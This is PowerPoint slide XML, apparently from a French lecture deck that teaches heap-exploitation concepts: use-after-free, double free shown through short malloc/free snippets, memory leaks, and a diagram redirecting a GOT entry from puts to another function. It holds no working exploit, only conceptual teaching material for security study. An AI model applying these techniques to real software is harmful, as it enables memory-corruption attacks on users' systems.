              <a:t>nutshell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7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356442-6A34-4234-99C2-55E6EE869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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>after</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> free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6E763A-AC69-48E1-8D91-68FD7CB42A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4" b="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1184989" y="3933056"/>
            <a:ext cx="9822019" cy="218883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BE567F0-BC39-4B80-B0F9-19631F47B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8" y="1600200"/>
            <a:ext cx="3810000" cy="2286000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Flèche : chevron 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6A5BE0B-FA58-414E-96B6-99971E728398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Flèche : chevron 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AF25142-AD3F-4384-AAFA-AFDFF72A0300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98A8DB40-CD2F-453C-AC54-D975397C1ADC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6B8862CA-58C9-4876-AC83-58570134F85C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9F814FE4-B515-4003-8B59-F9C452DFEB48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12" name="Flèche : chevron 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C67DCB3D-9CDF-4812-A1F1-D66B674C4056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32912583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B477E0-E5CD-4F88-B857-A34D5216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Bonus: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Leaking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> memory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5F20057-F498-4F28-99F9-F1F58A04B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72816"/>
            <a:ext cx="3456384" cy="11250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08567D-9921-43C0-8886-FF1F10B10050}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1867583" y="2132856"/>
            <a:ext cx="1368152" cy="288032"/>
          </a:xfrm>
          <a:prstGeom prst="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48F862-7E35-49C0-8B21-51ACDF005527}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2316088" y="3871883"/>
            <a:ext cx="1547664" cy="36004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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>puts_got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ABB71F-D3B6-4169-8775-33070799B644}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2316088" y="4231923"/>
            <a:ext cx="1547664" cy="3600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&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>print_red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5329B9-CABB-4D33-91B4-FD7460E31127}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5087888" y="3871883"/>
            <a:ext cx="1547664" cy="3600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puts</a:t>
            </a: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D38C98-C3D9-4902-ABCB-A7DB2188C4F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8112224" y="3871883"/>
            <a:ext cx="1547664" cy="20162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8B6479-F408-4205-8270-8DC7E781446A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5087888" y="4231923"/>
            <a:ext cx="1547664" cy="3600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9D43BA-7F84-4F05-87D9-2D9EFAA8931B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5087888" y="4591963"/>
            <a:ext cx="1547664" cy="3600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73A1F6-50C4-4F07-93EF-1B714C362BB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5087888" y="4937695"/>
            <a:ext cx="1547664" cy="3600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A9F5F7C-7568-486B-9743-98E86FA179ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="3"/>
            <a:endCxn id="8" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3863752" y="4051903"/>
            <a:ext cx="12241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1BDE290-03AA-464A-939A-3638FDD09B5C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6635552" y="4051903"/>
            <a:ext cx="1476672" cy="8280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000253CE-E569-45F5-ABAB-675BF2D89CD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8112224" y="3457383"/>
            <a:ext cx="147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libc</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b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19F65E0-944C-4A66-A9FE-0BDD94EDE73D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5087888" y="3446476"/>
            <a:ext cx="147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GOT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3F2F938-C46E-4AA0-AAF4-054B604C079B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2316088" y="3446476"/>
            <a:ext cx="147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hat</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Flèche : chevron 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8382EF84-746B-4577-8758-39CC0702FAC9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1" name="Flèche : chevron 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F50DD85-4F21-4FC3-A923-B6B20895545D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22" name="Flèche : chevron 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26D23B42-02A0-4812-A358-4C477FDC2867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" name="Flèche : chevron 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FDF8221-310E-4A2D-9C31-AEEAB3F8D6B5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4" name="Flèche : chevron 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F98800B4-7271-47E7-A146-3C3F26B81A50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25" name="Flèche : chevron 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{478C6C34-4A0C-446E-9908-E421140CF1BC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2246688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2B2387-AB3D-4A2A-BB3F-34F667637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 : concepts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3C637C-5FA0-43A9-ABDD-7C106D0D9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952128"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>char* a = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(4)</a:t>
            </a:r>
          </a:p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102A8A-44B1-4068-83D0-78D7B06AB140}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1775520" y="3664641"/>
            <a:ext cx="18002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A5BA78-19CD-4527-B7CC-9A52AF9F658C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1775520" y="4096689"/>
            <a:ext cx="18002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477480-630F-471B-9798-8BADC955592E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="767408" y="3664641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 : 0x10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0ED8FED-12AA-4B2F-874C-EE6AE92664C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="767408" y="4128047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: 0x20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6420D58-1CF1-45EA-B172-9DFAE7C5F100}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="802904" y="4629345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E6704D-CA25-4566-8E7D-9286DD9EFA67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5143795" y="5031313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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Connecteur : en angle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21132E44-7740-4ECE-A16E-D53D8413E419}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="3"/>
            <a:endCxn id="20" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3575720" y="4312713"/>
            <a:ext cx="1172031" cy="1151388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78CE7A0-96B3-448E-B2EC-0B8E694784F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5539839" y="5031313"/>
            <a:ext cx="3876572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71B17F-BFC2-4CBD-B848-A43C452F7A1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4747751" y="5031313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B5CBF4C-5DB6-448E-A699-B7D166517B09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4747751" y="6040905"/>
            <a:ext cx="46686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6E3F7CAD-50B7-4971-B2C8-A3D83CC6248A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5147268" y="3417797"/>
            <a:ext cx="1790153" cy="8655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E4D61AA-C52B-4131-9FA6-93C1D9FAE995}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4751224" y="3417797"/>
            <a:ext cx="396044" cy="8655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34496AC-A5EB-4B43-AA70-0E9A4CCB6836}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4741178" y="4396620"/>
            <a:ext cx="2196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2CBDD3B5-A8C4-4E1D-982B-246714074545}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5477359" y="440386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0x10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Flèche : chevron 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2398EBBA-09E2-4989-9C7F-869CC5947867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" name="Flèche : chevron 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C874E90E-68E2-4C2C-B101-7C82B9EC43A3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21" name="Flèche : chevron 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CB7A092-84B8-438D-B378-675AE7D44AC8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2" name="Flèche : chevron 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC08F864-B929-4805-AB0D-90E56967030B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4" name="Flèche : chevron 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7BF7284-D75C-4E91-A21E-84E571DCA474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25" name="Flèche : chevron 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0483CC9E-C6CD-4AE3-9C78-26957751DB04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14872260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2B2387-AB3D-4A2A-BB3F-34F667637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 : concepts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3C637C-5FA0-43A9-ABDD-7C106D0D9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952128"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>char* a = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(4)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>free(a)</a:t>
            </a:r>
          </a:p>
          <a:p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B76456-2910-4922-A121-298DAEED413B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5137916" y="3391706"/>
            <a:ext cx="396044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C62AFD-BE95-46E6-8A9F-EF5DA5F89C3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5539839" y="3391706"/>
            <a:ext cx="1400001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70B35C-038C-458E-859C-C8B9195F68F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4741872" y="3391706"/>
            <a:ext cx="396044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C867593-D57B-4F5B-AE53-5B3821E98EC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4741178" y="4387808"/>
            <a:ext cx="2196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DF41FDC8-DD35-402C-A69D-0ED3901B39AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1775520" y="3664641"/>
            <a:ext cx="18002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F79AC11-93E8-448D-9266-92FD227B8CDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1775520" y="4096689"/>
            <a:ext cx="18002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BBDF26BE-1ED7-4166-83A1-73A195F5C593}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="767408" y="3664641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 : 0x10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2204379-477A-4840-A8F2-0D87C7BCED2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="767408" y="4128047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: 0x20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AF8C7B7F-F588-4A2F-A56F-5E04BFCFA7F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="802904" y="4629345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BE54FD8-1AF2-4F30-B972-0C28CC7A3C8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5143795" y="5031313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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="50" name="Connecteur : en angle 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC95CBCA-9049-4FD4-A29A-AE5CCDEE15A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="45" idx="3"/>
            <a:endCxn id="52" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3575720" y="4312713"/>
            <a:ext cx="1172031" cy="1151388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108583C8-AE71-4DB9-AAD6-B4A1F38FA584}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5539839" y="5031313"/>
            <a:ext cx="3876572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45ACDF5-912B-4C7D-8CAE-470DBE438178}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4747751" y="5031313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CACE75D2-0D15-47C8-A8A3-43B69C899EB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4747751" y="6040905"/>
            <a:ext cx="46686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7" name="ZoneTexte 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13A4AB90-482A-41EA-9910-D91533B76E94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5477359" y="440386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0x10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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881369AF-92EF-472D-99E2-ADADE46D7E2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="44" idx="3"/>
            <a:endCxn id="21" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3575720" y="3824494"/>
            <a:ext cx="1166152" cy="56171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èche : chevron 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{537ACD8A-2F15-4594-BA35-9F9C4888D6CA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" name="Flèche : chevron 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{365495E3-4BA8-4032-AC41-E47F077A9EF4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24" name="Flèche : chevron 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91AF0593-27F8-411B-9D9E-FBE7D1CD640D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6" name="Flèche : chevron 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57C5CC74-A36E-4FBA-9396-F47ECEF80222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7" name="Flèche : chevron 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1B5033B-3131-4D36-9E2D-FAD3401D56FA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28" name="Flèche : chevron 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63637671-FF87-4D08-8E51-7677239BA41A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4145862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2B2387-AB3D-4A2A-BB3F-34F667637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 : concepts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3C637C-5FA0-43A9-ABDD-7C106D0D9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799"/>
            <a:ext cx="9144000" cy="2060847"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>char* a = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(4)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>free(a)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>free(a)</a:t>
            </a:r>
          </a:p>
          <a:p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7B56CE-469F-477B-A064-51F969C36C9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5137916" y="3391706"/>
            <a:ext cx="396044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3E31CAB-D394-4BA4-AE0A-F414BE14941C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5539839" y="3391706"/>
            <a:ext cx="1400001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BA2886-BDE9-4B51-8775-6C3C7FE5A6B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4741872" y="3391706"/>
            <a:ext cx="396044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3583402D-D591-4362-9F86-53BBBE72A556}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4741178" y="4387808"/>
            <a:ext cx="2196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A67F095-D46C-44AC-B869-09210646C48B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1775520" y="3664641"/>
            <a:ext cx="18002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0ADD079-02DB-47D5-A5D7-AE50ED858B03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1775520" y="4096689"/>
            <a:ext cx="18002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357ED6D-B059-4CA7-B345-F3098F87DBBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="767408" y="3664641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 : 0x10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AD014E3-96AB-450B-AAA4-BAB04496BD69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="767408" y="4128047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: 0x20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AADC52B-787E-409C-8B1B-C6AE663EE3A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="802904" y="4629345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89F472-4FBF-4520-81F0-A184DD477F2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5143795" y="5031313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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="Connecteur : en angle 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8B4E1F8-3F93-4009-A0FC-91DE8B33581D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="29" idx="3"/>
            <a:endCxn id="36" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3575720" y="4312713"/>
            <a:ext cx="1172031" cy="1151388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DC6780C7-83A4-4E58-8E90-B02EF83BF0F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5539839" y="5031313"/>
            <a:ext cx="3876572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846DAE8-D574-4DE9-ABE3-C8BB458BAB8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4747751" y="5031313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81D0E5FE-8610-45E1-9336-B5C8D1A8B1D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4747751" y="6040905"/>
            <a:ext cx="46686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EB33427F-3E2E-4B1C-9B97-CF808C26693A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5477359" y="440386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0x10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="39" name="Connecteur : en angle 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D07DDB9-E0A7-477F-9998-E91DE013F399}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="28" idx="3"/>
            <a:endCxn id="26" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3575720" y="3824494"/>
            <a:ext cx="1166152" cy="56171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 : en angle 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
